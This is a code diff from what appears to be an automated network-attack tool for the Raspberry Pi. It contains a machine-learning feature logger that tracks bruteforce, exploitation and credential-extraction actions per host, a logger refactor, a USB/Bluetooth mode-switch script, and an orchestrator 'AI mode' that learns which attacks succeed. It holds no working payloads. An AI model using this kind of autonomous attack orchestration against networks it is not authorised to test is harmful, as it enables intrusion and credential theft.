# Get all hosts
all_hosts = self.db.get_all_hosts()
# Network size
features['total_hosts'] = len(all_hosts)
# Subnet distribution
subnet_counts = defaultdict(int)
for h in all_hosts:
ips = [p.strip() for p in (h.get('ips', '') or '').split(';') if p.strip()]
if ips:
subnet = '.'.join(ips[0].split('.')[:3]) + '.0'
subnet_counts[subnet] += 1
features['subnet_count'] = len(subnet_counts)
features['largest_subnet_size'] = max(subnet_counts.values()) if subnet_counts else 0
# Similar hosts (same vendor)
target_host = self.db.get_host_by_mac(mac)
if target_host:
vendor = target_host.get('vendor', '')
similar = sum(1 for h in all_hosts if h.get('vendor') == vendor)
features['similar_vendor_count'] = similar
# Port correlation (hosts with similar port profiles)
target_ports = set()
if target_host:
ports_str = target_host.get('ports', '') or ''
target_ports = {int(p) for p in ports_str.split(';') if p.strip().isdigit()}
if target_ports:
similar_port_hosts = 0
for h in all_hosts:
if h.get('mac_address') == mac:
continue
ports_str = h.get('ports', '') or ''
other_ports = {int(p) for p in ports_str.split(';') if p.strip().isdigit()}
# Calculate Jaccard similarity
if other_ports:
intersection = len(target_ports & other_ports)
union = len(target_ports | other_ports)
similarity = intersection / union if union > 0 else 0
if similarity > 0.5: # >50% similar
similar_port_hosts += 1
features['similar_port_profile_count'] = similar_port_hosts
# Network activity level
recent_hosts = sum(1 for h in all_hosts
if self._is_recently_active(h.get('last_seen')))
features['active_host_ratio'] = round(recent_hosts / len(all_hosts), 2) if all_hosts else 0
except Exception as e:
logger.error(f"Error extracting network features: {e}")
return features
def _extract_temporal_features(self, mac: str, action: str) -> Dict[str, Any]:
"""
Extract time-based and sequence features.
Discovers temporal patterns in attack sequences.
"""
features = {}
try:
# Current time features
now = datetime.now()
features['hour_of_day'] = now.hour
features['day_of_week'] = now.weekday()
features['is_weekend'] = now.weekday() >= 5
features['is_night'] = now.hour < 6 or now.hour >= 22
# Action history for this host
history = list(self.host_history.get(mac, []))
features['previous_action_count'] = len(history)
if history:
# Last action
last = history[-1]
features['last_action'] = last['action']
features['last_action_success'] = last['success']
features['seconds_since_last'] = round(time.time() - last['timestamp'], 1)
# Success rate history
successes = sum(1 for h in history if h['success'])
features['historical_success_rate'] = round(successes / len(history), 2)
# Action sequence
recent_sequence = [h['action'] for h in history[-5:]]
features['recent_action_sequence'] = recent_sequence
# Repeated action detection
same_action_count = sum(1 for h in history if h['action'] == action)
features['same_action_attempts'] = same_action_count
features['is_retry'] = same_action_count > 0
# Global action patterns
recent = list(self.recent_actions)
if recent:
# Action distribution in recent history
action_counts = defaultdict(int)
for a in recent:
action_counts[a['action']] += 1
features['most_common_recent_action'] = max(
action_counts.items(),
key=lambda x: x[1]
)[0] if action_counts else None
# Global success rate
global_successes = sum(1 for a in recent if a['success'])
features['global_success_rate'] = round(
global_successes / len(recent), 2
)
# Time since first seen
host = self.db.get_host_by_mac(mac)
if host and host.get('first_seen'):
ts = host['first_seen']
if isinstance(ts, str):
try:
first_seen = datetime.fromisoformat(ts)
except ValueError:
first_seen = now
elif isinstance(ts, datetime):
first_seen = ts
else:
first_seen = now
features['hours_since_discovery'] = round(
(now - first_seen).total_seconds() / 3600, 1
)
except Exception as e:
logger.error(f"Error extracting temporal features: {e}")
return features
def _extract_action_features(self, action_name: str, raw_event: Dict) -> Dict[str, Any]:
"""
Extract action-specific features.
Auto-discovers relevant metadata from action execution.
"""
features = {}
try:
features['action_name'] = action_name
# Action type classification
features['action_type'] = self._classify_action_type(action_name)
# Port-specific actions
port = raw_event.get('port')
if port:
features['target_port'] = int(port)
features['is_standard_port'] = int(port) < 1024
# Extract any additional metadata from raw event
# This allows actions to add custom features
if 'metadata' in raw_event:
metadata = raw_event['metadata']
if isinstance(metadata, dict):
# Flatten metadata into features
for key, value in metadata.items():
if isinstance(value, (int, float, bool, str)):
features[f'meta_{key}'] = value
# Execution context
features['operation_mode'] = self.shared_data.operation_mode
except Exception as e:
logger.error(f"Error extracting action features: {e}")
return features
# ═══════════════════════════════════════════════════════════════════════
# HELPER METHODS
# ═══════════════════════════════════════════════════════════════════════
def _categorize_vendor(self, vendor: str) -> str:
"""Categorize vendor into high-level groups"""
if not vendor:
return 'unknown'
vendor_lower = vendor.lower()
categories = {
'networking': ['cisco', 'juniper', 'ubiquiti', 'mikrotik', 'tp-link', 'netgear', 'asus', 'd-link', 'linksys'],
'iot': ['hikvision', 'dahua', 'axis', 'hanwha', 'tuya', 'sonoff', 'shelly', 'xiaomi', 'yeelight'],
'nas': ['synology', 'qnap', 'netapp', 'truenas', 'unraid'],
'compute': ['raspberry', 'intel', 'apple', 'dell', 'hp', 'lenovo', 'acer'],
'virtualization': ['vmware', 'microsoft', 'citrix', 'proxmox'],
'mobile': ['apple', 'samsung', 'huawei', 'xiaomi', 'google', 'oneplus']
}
for category, vendors in categories.items():
if any(v in vendor_lower for v in vendors):
return category
return 'other'
def _is_private_ip(self, ip: str) -> bool:
"""Check if IP is in private range"""
if not ip:
return False
parts = ip.split('.')
if len(parts) != 4:
return False
try:
first = int(parts[0])
second = int(parts[1])
return (
first == 10 or
(first == 172 and 16 <= second <= 31) or
(first == 192 and second == 168)
)
except:
return False
def _detect_port_profile(self, ports: List[int]) -> str:
"""Auto-detect device type from port signature"""
if not ports:
return 'unknown'
port_set = set(ports)
profiles = {
'camera': {554, 80, 8000, 37777},
'web_server': {80, 443, 8080, 8443},
'nas': {5000, 5001, 548, 139, 445},
'database': {3306, 5432, 1433, 27017, 6379},
'linux_server': {22, 80, 443},
'windows_server': {135, 139, 445, 3389},
'printer': {9100, 515, 631},
'router': {22, 23, 80, 443, 161}
}
max_overlap = 0
best_profile = 'generic'
for profile_name, profile_ports in profiles.items():
overlap = len(port_set & profile_ports)
if overlap > max_overlap:
max_overlap = overlap
best_profile = profile_name
return best_profile if max_overlap >= 2 else 'generic'
def _get_services_for_host(self, mac: str) -> List[str]:
"""Get list of detected services for host"""
try:
results = self.db.query("""
SELECT DISTINCT service
FROM port_services
WHERE mac_address=?
""", (mac,))
return [r['service'] for r in results if r.get('service')]
except:
return []
def _extract_hostname_hints(self, hostname: str) -> List[str]:
"""Extract hints from hostname"""
if not hostname:
return []
hints = []
hostname_lower = hostname.lower()
keywords = {
'nas': ['nas', 'storage', 'diskstation'],
'camera': ['cam', 'ipc', 'nvr', 'dvr'],
'router': ['router', 'gateway', 'gw'],
'server': ['server', 'srv', 'host'],
'printer': ['printer', 'print'],
'iot': ['iot', 'sensor', 'smart']
}
for hint, words in keywords.items():
if any(word in hostname_lower for word in words):
hints.append(hint)
return hints
def _get_credentials_for_host(self, mac: str) -> List[Dict]:
"""Get credentials found for host"""
try:
return self.db.query("""
SELECT service, user, port
FROM creds
WHERE mac_address=?
""", (mac,))
except:
return []
def _guess_os(self, vendor: str, ports: List[int], hostnames: List[str]) -> str:
"""Guess OS from available indicators"""
if not vendor and not ports and not hostnames:
return 'unknown'
vendor_lower = (vendor or '').lower()
port_set = set(ports or [])
hostname = hostnames[0].lower() if hostnames else ''
# Strong indicators
if 'microsoft' in vendor_lower or 3389 in port_set:
return 'windows'
if 'apple' in vendor_lower or 'mac' in hostname:
return 'macos'
if 'raspberry' in vendor_lower:
return 'linux'
# Port-based guessing
if {22, 80} <= port_set:
return 'linux'
if {135, 139, 445} <= port_set:
return 'windows'
# Hostname hints
if any(word in hostname for word in ['ubuntu', 'debian', 'centos', 'rhel']):
return 'linux'
return 'unknown'
def _is_recently_active(self, last_seen: Optional[str]) -> bool:
"""Check if host was active in last 24h"""
if not last_seen:
return False
try:
if isinstance(last_seen, str):
last_seen_dt = datetime.fromisoformat(last_seen)
elif isinstance(last_seen, datetime):
last_seen_dt = last_seen
else:
return False
hours_ago = (datetime.now() - last_seen_dt).total_seconds() / 3600
return hours_ago < 24
except:
return False
def _classify_action_type(self, action_name: str) -> str:
"""Classify action into high-level categories"""
action_lower = action_name.lower()
if 'brute' in action_lower or 'crack' in action_lower:
return 'bruteforce'
elif 'scan' in action_lower or 'enum' in action_lower:
return 'enumeration'
elif 'exploit' in action_lower:
return 'exploitation'
elif 'dump' in action_lower or 'extract' in action_lower:
return 'extraction'
else:
return 'other'
# ═══════════════════════════════════════════════════════════════════════
# FEATURE AGGREGATION & EXPORT
# ═══════════════════════════════════════════════════════════════════════
def get_stats(self) -> Dict[str, Any]:
"""Get current feature logging statistics"""
try:
total = self.db.query("SELECT COUNT(*) as cnt FROM ml_features")[0]['cnt']
unconsolidated = self.db.query(
"SELECT COUNT(*) as cnt FROM ml_features WHERE consolidated=0"
)[0]['cnt']
return {
'total_features_logged': total,
'unconsolidated_count': unconsolidated,
'ready_for_export': unconsolidated,
'recent_actions_buffer': len(self.recent_actions),
'hosts_tracked': len(self.host_history)
}
except Exception as e:
logger.error(f"Error getting feature stats: {e}")
return {}
# ═══════════════════════════════════════════════════════════════════════════
# END OF FILE
# ═══════════════════════════════════════════════════════════════════════════

157
logger.py
View File

@@ -1,87 +1,162 @@
# logger.py # logger.py
import logging import logging
from logging.handlers import RotatingFileHandler
import os import os
import threading
import time
from logging.handlers import RotatingFileHandler
SUCCESS_LEVEL_NUM = 25 SUCCESS_LEVEL_NUM = 25
logging.addLevelName(SUCCESS_LEVEL_NUM, "SUCCESS") logging.addLevelName(SUCCESS_LEVEL_NUM, "SUCCESS")
def success(self, message, *args, **kwargs): def success(self, message, *args, **kwargs):
if self.isEnabledFor(SUCCESS_LEVEL_NUM): if self.isEnabledFor(SUCCESS_LEVEL_NUM):
self._log(SUCCESS_LEVEL_NUM, message, args, **kwargs) self._log(SUCCESS_LEVEL_NUM, message, args, **kwargs)
logging.Logger.success = success logging.Logger.success = success
class VerticalFilter(logging.Filter): class VerticalFilter(logging.Filter):
def filter(self, record): def filter(self, record):
return 'Vertical' not in record.getMessage() return "Vertical" not in record.getMessage()
class Logger: class Logger:
LOGS_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'data', 'logs') LOGS_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), "data", "logs")
LOG_FILE = os.path.join(LOGS_DIR, "Bjorn.log") LOG_FILE = os.path.join(LOGS_DIR, "Bjorn.log")
_HANDLERS_LOCK = threading.Lock()
_SHARED_CONSOLE_HANDLER = None
_SHARED_FILE_HANDLER = None
@classmethod
def _ensure_shared_handlers(cls, enable_file_logging: bool):
"""
Create shared handlers once.
Why: every action instantiates Logger(name=...), which used to create a new
RotatingFileHandler per logger name, leaking file descriptors (Bjorn.log opened N times).
"""
with cls._HANDLERS_LOCK:
if cls._SHARED_CONSOLE_HANDLER is None:
h = logging.StreamHandler()
# Do not filter by handler level; per-logger level controls output.
h.setLevel(logging.NOTSET)
h.setFormatter(
logging.Formatter(
"%(asctime)s - %(name)s - %(levelname)s - %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
)
)
h.addFilter(VerticalFilter())
cls._SHARED_CONSOLE_HANDLER = h
if enable_file_logging and cls._SHARED_FILE_HANDLER is None:
os.makedirs(cls.LOGS_DIR, exist_ok=True)
h = RotatingFileHandler(
cls.LOG_FILE,
maxBytes=5 * 1024 * 1024,
backupCount=2,
)
h.setLevel(logging.NOTSET)
h.setFormatter(
logging.Formatter(
"%(asctime)s - %(name)s - %(levelname)s - %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
)
)
h.addFilter(VerticalFilter())
cls._SHARED_FILE_HANDLER = h
handlers = [cls._SHARED_CONSOLE_HANDLER]
if enable_file_logging and cls._SHARED_FILE_HANDLER is not None:
handlers.append(cls._SHARED_FILE_HANDLER)
return handlers
# Max entries before automatic purge of stale throttle keys
_THROTTLE_MAX_KEYS = 200
_THROTTLE_PURGE_AGE = 600.0 # Remove keys older than 10 minutes
def __init__(self, name="Logger", level=logging.DEBUG, enable_file_logging=True): def __init__(self, name="Logger", level=logging.DEBUG, enable_file_logging=True):
self.logger = logging.getLogger(name) self.logger = logging.getLogger(name)
self.logger.setLevel(level) self.logger.setLevel(level)
self.logger.propagate = False # ✅ Évite les logs en double self.logger.propagate = False
self.enable_file_logging = enable_file_logging self.enable_file_logging = enable_file_logging
self._throttle_lock = threading.Lock()
self._throttle_state = {}
self._throttle_last_purge = 0.0
# Évite d'ajouter plusieurs fois les mêmes handlers # Attach shared handlers (singleton) to avoid leaking file descriptors.
if not self.logger.handlers: for h in self._ensure_shared_handlers(self.enable_file_logging):
console_handler = logging.StreamHandler() if h not in self.logger.handlers:
console_handler.setLevel(level) self.logger.addHandler(h)
console_handler.setFormatter(logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S'
))
console_handler.addFilter(VerticalFilter())
self.logger.addHandler(console_handler)
if self.enable_file_logging:
os.makedirs(self.LOGS_DIR, exist_ok=True)
file_handler = RotatingFileHandler(self.LOG_FILE, maxBytes=5*1024*1024, backupCount=2)
file_handler.setLevel(level)
file_handler.setFormatter(logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S'
))
file_handler.addFilter(VerticalFilter())
self.logger.addHandler(file_handler)
def set_level(self, level): def set_level(self, level):
self.logger.setLevel(level) self.logger.setLevel(level)
for handler in self.logger.handlers: for handler in self.logger.handlers:
handler.setLevel(level) handler.setLevel(level)
def debug(self, msg): self.logger.debug(msg) def debug(self, msg, *args, **kwargs):
def info(self, msg): self.logger.info(msg) self.logger.debug(msg, *args, **kwargs)
def warning(self, msg): self.logger.warning(msg)
def error(self, msg): self.logger.error(msg) def info(self, msg, *args, **kwargs):
def critical(self, msg): self.logger.critical(msg) self.logger.info(msg, *args, **kwargs)
def success(self, msg): self.logger.success(msg)
def disable_logging(self): logging.disable(logging.CRITICAL) def warning(self, msg, *args, **kwargs):
self.logger.warning(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
self.logger.error(msg, *args, **kwargs)
def critical(self, msg, *args, **kwargs):
self.logger.critical(msg, *args, **kwargs)
def success(self, msg, *args, **kwargs):
self.logger.success(msg, *args, **kwargs)
def info_throttled(self, msg, key=None, interval_s=60.0):
self._log_throttled(logging.INFO, msg, key=key, interval_s=interval_s)
def warning_throttled(self, msg, key=None, interval_s=60.0):
self._log_throttled(logging.WARNING, msg, key=key, interval_s=interval_s)
def error_throttled(self, msg, key=None, interval_s=60.0):
self._log_throttled(logging.ERROR, msg, key=key, interval_s=interval_s)
def _log_throttled(self, level, msg, key=None, interval_s=60.0):
throttle_key = key or f"{level}:{msg}"
now = time.monotonic()
with self._throttle_lock:
last = self._throttle_state.get(throttle_key, 0.0)
if (now - last) < max(0.0, float(interval_s)):
return
self._throttle_state[throttle_key] = now
# Periodic purge of stale keys to prevent unbounded growth
if len(self._throttle_state) > self._THROTTLE_MAX_KEYS and (now - self._throttle_last_purge) > 60.0:
self._throttle_last_purge = now
stale = [k for k, v in self._throttle_state.items() if (now - v) > self._THROTTLE_PURGE_AGE]
for k in stale:
del self._throttle_state[k]
self.logger.log(level, msg)
def disable_logging(self):
logging.disable(logging.CRITICAL)
# Example usage
if __name__ == "__main__": if __name__ == "__main__":
# Change enable_file_logging to False to disable file logging
log = Logger(name="MyLogger", level=logging.DEBUG, enable_file_logging=False) log = Logger(name="MyLogger", level=logging.DEBUG, enable_file_logging=False)
log.debug("This is a debug message") log.debug("This is a debug message")
log.info("This is an info message") log.info("This is an info message")
log.warning("This is a warning message") log.warning("This is a warning message")
log.error("This is an error message") log.error("This is an error message")
log.critical("This is a critical message") log.critical("This is a critical message")
log.success("This is a success message") log.success("This is a success message")
# Change log level
log.set_level(logging.WARNING) log.set_level(logging.WARNING)
log.debug("This debug message should not appear") log.debug("This debug message should not appear")
log.info("This info message should not appear") log.info("This info message should not appear")
log.warning("This warning message should appear") log.warning("This warning message should appear")
# Disable logging
log.disable_logging() log.disable_logging()
log.error("This error message should not appear") log.error("This error message should not appear")

302
mode-switcher.sh Normal file
View File

@@ -0,0 +1,302 @@
#!/bin/bash
# Colors for menu
RED='\033[0;31m'
GREEN='\033[0;32m'
BLUE='\033[0;34m'
NC='\033[0m' # No Color
# Function to show help
show_help() {
echo "Usage: $0 [OPTION]"
echo "Manage USB Gadget and Bluetooth modes on Raspberry Pi"
echo
echo "Options:"
echo " -h, --help Show this help message"
echo " -bluetooth Enable Bluetooth mode"
echo " -usb Enable USB Gadget mode"
echo " -status Show current status"
echo
echo "Without options, the script runs in interactive menu mode"
exit 0
}
# Add notice about reboot after USB functions
notify_reboot() {
echo -e "${BLUE}Important:${NC} A reboot is required for the USB interface to appear on the host system (Windows/Mac/Linux)"
echo -e "${BLUE}Please run:${NC} sudo reboot"
}
# Function to enable USB Gadget mode
enable_usb() {
echo -e "${BLUE}Enabling USB Gadget mode...${NC}"
# Stop bluetooth and related services
echo "Stopping Bluetooth services..."
sudo systemctl stop auto_bt_connect
sudo systemctl disable auto_bt_connect
sudo systemctl stop bluetooth
sudo systemctl disable bluetooth
sleep 2
# Kill any existing processes that might interfere
echo "Cleaning up processes..."
sudo killall -9 dnsmasq 2>/dev/null || true
# Stop all related services
echo "Stopping all related services..."
sudo systemctl stop usb-gadget
sudo systemctl stop dnsmasq
sudo systemctl stop systemd-networkd
# Remove any existing network configuration
echo "Cleaning up network configuration..."
sudo ip link set usb0 down 2>/dev/null || true
sudo ip addr flush dev usb0 2>/dev/null || true
# Aggressive cleanup of USB modules
echo "Unloading USB modules..."
modules="g_ether usb_f_ecm usb_f_rndis u_ether libcomposite dwc2"
for module in $modules; do
sudo rmmod $module 2>/dev/null || true
done
sleep 2
# Clean up USB gadget configuration
if [ -d "/sys/kernel/config/usb_gadget/g1" ]; then
echo "Removing existing gadget configuration..."
cd /sys/kernel/config/usb_gadget/g1
echo "" > UDC 2>/dev/null || true
rm -f configs/c.1/ecm.usb0 2>/dev/null || true
cd ..
rmdir g1 2>/dev/null || true
fi
# Reset USB controller
echo "Resetting USB controller..."
if [ -e "/sys/bus/platform/drivers/dwc2" ]; then
if [ -e "/sys/bus/platform/drivers/dwc2/20980000.usb" ]; then
echo "20980000.usb" | sudo tee /sys/bus/platform/drivers/dwc2/unbind 2>/dev/null || true
sleep 2
fi
echo "20980000.usb" | sudo tee /sys/bus/platform/drivers/dwc2/bind 2>/dev/null || true
sleep 2
fi
# Load modules in correct order with verification
echo "Loading USB modules..."
sudo modprobe dwc2
sleep 2
if ! lsmod | grep -q "^dwc2"; then
echo -e "${RED}Error: Could not load dwc2${NC}"
return 1
fi
sudo modprobe libcomposite
sleep 2
if ! lsmod | grep -q "^libcomposite"; then
echo -e "${RED}Error: Could not load libcomposite${NC}"
return 1
fi
# Start services in correct order
echo "Starting network services..."
sudo systemctl start systemd-networkd
sleep 2
echo "Starting USB gadget service..."
sudo systemctl enable usb-gadget
sudo systemctl restart usb-gadget
sleep 5
# Verify USB gadget configuration
echo "Verifying USB gadget configuration..."
if ! ip link show usb0 >/dev/null 2>&1; then
echo -e "${RED}USB Gadget interface (usb0) not found. Checking logs...${NC}"
sudo journalctl -xe --no-pager -n 50 -u usb-gadget
return 1
fi
if ! ip link show usb0 | grep -q "UP"; then
echo -e "${RED}USB Gadget interface exists but is not UP. Attempting to bring it up...${NC}"
sudo ip link set usb0 up
sleep 2
if ! ip link show usb0 | grep -q "UP"; then
echo -e "${RED}Failed to bring up USB interface${NC}"
return 1
fi
fi
echo -e "${GREEN}USB Gadget interface is up and running${NC}"
# Wait for interface with timeout
echo "Waiting for USB interface..."
for i in {1..15}; do
if ip link show usb0 > /dev/null 2>&1; then
echo "USB interface detected"
sudo ip link set usb0 up
sudo ip addr add 172.20.2.1/24 dev usb0 2>/dev/null || true
break
fi
echo "Attempt $i/15..."
sleep 1
done
if ip link show usb0 > /dev/null 2>&1; then
echo "Starting DHCP server..."
sudo systemctl restart dnsmasq
echo -e "${GREEN}USB Gadget mode successfully enabled${NC}"
ip a | grep usb0
else
echo -e "${RED}Failed to create USB interface${NC}"
return 1
fi
}
# Function to enable Bluetooth mode
enable_bluetooth() {
echo -e "${BLUE}Enabling Bluetooth mode...${NC}"
# Stop USB gadget
echo "Stopping USB gadget..."
sudo systemctl stop usb-gadget
sudo systemctl disable usb-gadget
# Aggressive cleanup of modules
echo "Cleaning up modules..."
modules="g_ether usb_f_ecm usb_f_rndis u_ether libcomposite dwc2"
for module in $modules; do
sudo rmmod $module 2>/dev/null || true
done
sleep 2
# Force USB reconnect if possible
if [ -e "/sys/bus/platform/drivers/dwc2" ]; then
echo "Resetting USB controller..."
echo "20980000.usb" | sudo tee /sys/bus/platform/drivers/dwc2/unbind 2>/dev/null || true
sleep 2
echo "20980000.usb" | sudo tee /sys/bus/platform/drivers/dwc2/bind 2>/dev/null || true
sleep 2
fi
# Enable and start Bluetooth
echo "Starting Bluetooth..."
sudo systemctl enable bluetooth
sudo systemctl start bluetooth
# Wait for Bluetooth to initialize
sleep 3
# Start auto_bt_connect service last
echo "Starting auto_bt_connect service..."
sudo systemctl enable auto_bt_connect
sudo systemctl start auto_bt_connect
# Status check
if systemctl is-active --quiet bluetooth; then
echo -e "${GREEN}Bluetooth mode successfully enabled${NC}"
echo "Bluetooth status:"
sudo hciconfig
if systemctl is-active --quiet auto_bt_connect; then
echo -e "${GREEN}Auto BT Connect service is running${NC}"
else
echo -e "${RED}Warning: auto_bt_connect service failed to start${NC}"
fi
else
echo -e "${RED}Error while enabling Bluetooth mode${NC}"
echo "Service logs:"
sudo systemctl status bluetooth
return 1
fi
}
# Function to show current status
show_status() {
echo -e "${BLUE}Current services status:${NC}"
echo "----------------------------------------"
echo -n "USB Gadget: "
if ip link show usb0 >/dev/null 2>&1 && ip link show usb0 | grep -q "UP"; then
echo -e "${GREEN}ACTIVE${NC}"
else
echo -e "${RED}INACTIVE${NC}"
fi
echo -n "Bluetooth: "
if systemctl is-active --quiet bluetooth; then
echo -e "${GREEN}ACTIVE${NC}"
else
echo -e "${RED}INACTIVE${NC}"
fi
echo -n "Auto BT Connect: "
if systemctl is-active --quiet auto_bt_connect; then
echo -e "${GREEN}ACTIVE${NC}"
else
echo -e "${RED}INACTIVE${NC}"
fi
echo "----------------------------------------"
}
# Parse command line arguments
if [ $# -gt 0 ]; then
case "$1" in
-h|--help)
show_help
;;
-bluetooth)
enable_bluetooth
exit 0
;;
-usb)
enable_usb
notify_reboot
exit 0
;;
-status)
show_status
exit 0
;;
*)
echo -e "${RED}Unknown option: $1${NC}"
show_help
;;
esac
fi
# Main menu (only shown if no arguments provided)
while true; do
clear
echo -e "${BLUE}=== USB/Bluetooth Mode Manager ===${NC}"
echo "1. Enable USB Gadget mode"
echo "2. Enable Bluetooth mode"
echo "3. Show status"
echo "4. Exit"
echo
show_status
echo
read -p "Choose an option (1-4): " choice
case $choice in
1)
enable_usb
notify_reboot
read -p "Press Enter to continue..."
;;
2)
enable_bluetooth
read -p "Press Enter to continue..."
;;
3)
show_status
read -p "Press Enter to continue..."
;;
4)
echo "Goodbye!"
exit 0
;;
*)
echo -e "${RED}Invalid option${NC}"
read -p "Press Enter to continue..."
;;
esac
done

View File

@@ -12,6 +12,9 @@ from typing import Any, Dict, List, Optional
from init_shared import shared_data from init_shared import shared_data
from logger import Logger from logger import Logger
from action_scheduler import ActionScheduler from action_scheduler import ActionScheduler
from ai_engine import get_or_create_ai_engine, invalidate_ai_engine
from feature_logger import FeatureLogger
from data_consolidator import DataConsolidator
logger = Logger(name="orchestrator.py", level=logging.DEBUG) logger = Logger(name="orchestrator.py", level=logging.DEBUG)
@@ -25,10 +28,117 @@ class Orchestrator:
self.network_scanner = None self.network_scanner = None
self.scheduler = None self.scheduler = None
self.scheduler_thread = None self.scheduler_thread = None
self._loop_error_backoff = 1.0
# ┌─────────────────────────────────────────────────────────┐
# │ AI / Feature-logging Components │
# └─────────────────────────────────────────────────────────┘
# feature_logger runs in AUTO and AI mode to collect training data
# from ALL automated executions.
# ai_engine + data_consolidator run only in AI mode.
self.ai_engine = None
self.data_consolidator = None
self.ai_enabled = bool(self.shared_data.operation_mode == "AI")
self._ai_server_failure_streak = 0
# FeatureLogger: active as long as the orchestrator runs (AUTO or AI)
self.feature_logger = None
if self.shared_data.operation_mode in ("AUTO", "AI"):
try:
self.feature_logger = FeatureLogger(self.shared_data)
logger.info("FeatureLogger initialized (data collection active)")
except Exception as e:
logger.info_throttled(
f"FeatureLogger unavailable; execution data will not be logged: {e}",
key="orch_feature_logger_init_failed",
interval_s=300.0,
)
self.feature_logger = None
if self.ai_enabled:
try:
self.ai_engine = get_or_create_ai_engine(self.shared_data)
self.data_consolidator = DataConsolidator(self.shared_data)
logger.info("AI engine + DataConsolidator initialized (AI mode)")
except Exception as e:
logger.info_throttled(
f"AI mode active but AI components unavailable; continuing heuristic-only: {e}",
key="orch_ai_init_failed",
interval_s=300.0,
)
self.ai_engine = None
self.data_consolidator = None
self.ai_enabled = False
# Load all available actions # Load all available actions
self.load_actions() self.load_actions()
logger.info(f"Actions loaded: {list(self.actions.keys())}") logger.info(f"Actions loaded: {list(self.actions.keys())}")
def _is_enabled_value(self, value: Any) -> bool:
"""Robust parser for b_enabled values coming from DB."""
if value is None:
return True
if isinstance(value, bool):
return value
if isinstance(value, (int, float)):
return int(value) == 1
s = str(value).strip().lower()
if s in {"1", "true", "yes", "on"}:
return True
if s in {"0", "false", "no", "off"}:
return False
try:
return int(float(s)) == 1
except Exception:
return True
def _is_action_eligible_for_ai_learning(self, action_name: str) -> bool:
"""Exclude control-plane actions from AI training/reward."""
return str(action_name) not in {"NetworkScanner"}
def _update_ai_server_health(self, contact_events: List[bool]) -> None:
"""
Update consecutive AI server failure counter and fallback to AUTO when needed.
`contact_events` contains one bool per attempted contact in this cycle.
"""
if not contact_events:
return
contacted_ok = any(contact_events)
if contacted_ok:
if self._ai_server_failure_streak > 0:
logger.info("AI server contact recovered; reset failure streak")
self._ai_server_failure_streak = 0
return
self._ai_server_failure_streak += 1
max_failures = max(
1,
int(getattr(self.shared_data, "ai_server_max_failures_before_auto", 3)),
)
model_loaded = bool(getattr(self.ai_engine, "model_loaded", False))
if self.shared_data.operation_mode == "AI" and (not model_loaded):
remaining_cycles = max(0, max_failures - self._ai_server_failure_streak)
if remaining_cycles > 0:
logger.info_throttled(
f"AI server unreachable ({self._ai_server_failure_streak}/{max_failures}) and no local model loaded; "
f"AUTO fallback in {remaining_cycles} cycle(s) if server remains offline",
key="orch_ai_unreachable_no_model_pre_fallback",
interval_s=60.0,
)
if (
self.shared_data.operation_mode == "AI"
and self._ai_server_failure_streak >= max_failures
and (not model_loaded)
):
logger.warning(
f"AI server unreachable for {self._ai_server_failure_streak} consecutive cycles and no local AI model is loaded; "
"switching operation mode to AUTO (heuristics-only)"
)
self.shared_data.operation_mode = "AUTO"
self._disable_ai_components()
def load_actions(self): def load_actions(self):
"""Load all actions from database""" """Load all actions from database"""
@@ -64,9 +174,82 @@ class Orchestrator:
except Exception as e: except Exception as e:
logger.error(f"Failed to load action {b_class}: {e}") logger.error(f"Failed to load action {b_class}: {e}")
# ----------------------------------------------------------------- AI mode
def _ensure_feature_logger(self) -> None:
"""Init FeatureLogger if not yet running (called when entering AUTO or AI mode)."""
if self.feature_logger is not None:
return
try:
self.feature_logger = FeatureLogger(self.shared_data)
logger.info("FeatureLogger enabled")
except Exception as e:
logger.info_throttled(
f"FeatureLogger unavailable: {e}",
key="orch_feature_logger_enable_failed",
interval_s=300.0,
)
def _enable_ai_components(self) -> None:
"""Lazy-init AI-specific helpers when switching to AI mode at runtime."""
self._ensure_feature_logger()
if self.ai_engine and self.data_consolidator:
self.ai_enabled = True
return
try:
self.ai_engine = get_or_create_ai_engine(self.shared_data)
self.data_consolidator = DataConsolidator(self.shared_data)
self.ai_enabled = True
if self.ai_engine and not bool(getattr(self.ai_engine, "model_loaded", False)):
logger.warning(
"AI mode active but no local model loaded yet; "
"will fallback to AUTO if server stays unreachable"
)
logger.info("AI engine + DataConsolidator enabled")
except Exception as e:
self.ai_engine = None
self.data_consolidator = None
self.ai_enabled = False
logger.info_throttled(
f"AI components not available; staying heuristic-only: {e}",
key="orch_ai_enable_failed",
interval_s=300.0,
)
def _disable_ai_components(self) -> None:
"""Drop AI-specific helpers when leaving AI mode.
FeatureLogger is kept alive so AUTO mode still collects data."""
self.ai_enabled = False
self.ai_engine = None
self.data_consolidator = None
# Release cached AI engine singleton so model weights can be freed in AUTO mode.
try:
invalidate_ai_engine(self.shared_data)
except Exception:
pass
def _sync_ai_components(self) -> None:
"""Keep runtime AI helpers aligned with shared_data.operation_mode."""
mode = self.shared_data.operation_mode
if mode == "AI":
if not self.ai_enabled:
self._enable_ai_components()
else:
if self.ai_enabled:
self._disable_ai_components()
# Ensure feature_logger is alive in AUTO mode too
if mode == "AUTO":
self._ensure_feature_logger()
def start_scheduler(self): def start_scheduler(self):
"""Start the scheduler in background""" """Start the scheduler in background"""
if self.scheduler_thread and self.scheduler_thread.is_alive():
logger.info("ActionScheduler thread already running")
return
logger.info("Starting ActionScheduler in background...") logger.info("Starting ActionScheduler in background...")
self.scheduler = ActionScheduler(self.shared_data) self.scheduler = ActionScheduler(self.shared_data)
self.scheduler_thread = threading.Thread( self.scheduler_thread = threading.Thread(
@@ -87,24 +270,227 @@ class Orchestrator:
) )
return action return action
def _build_host_state(self, mac_address: str) -> Dict:
"""
Build RL state dict from host data in database.
Args:
mac_address: Target MAC address
Returns:
Dict with keys: mac, ports, hostname
"""
try:
# Get host from database
host = self.shared_data.db.get_host_by_mac(mac_address)
if not host:
logger.warning(f"Host not found for MAC: {mac_address}")
return {'mac': mac_address, 'ports': [], 'hostname': ''}
# Parse ports
ports_str = host.get('ports', '')
ports = []
if ports_str:
for p in ports_str.split(';'):
p = p.strip()
if p.isdigit():
ports.append(int(p))
# Get first hostname
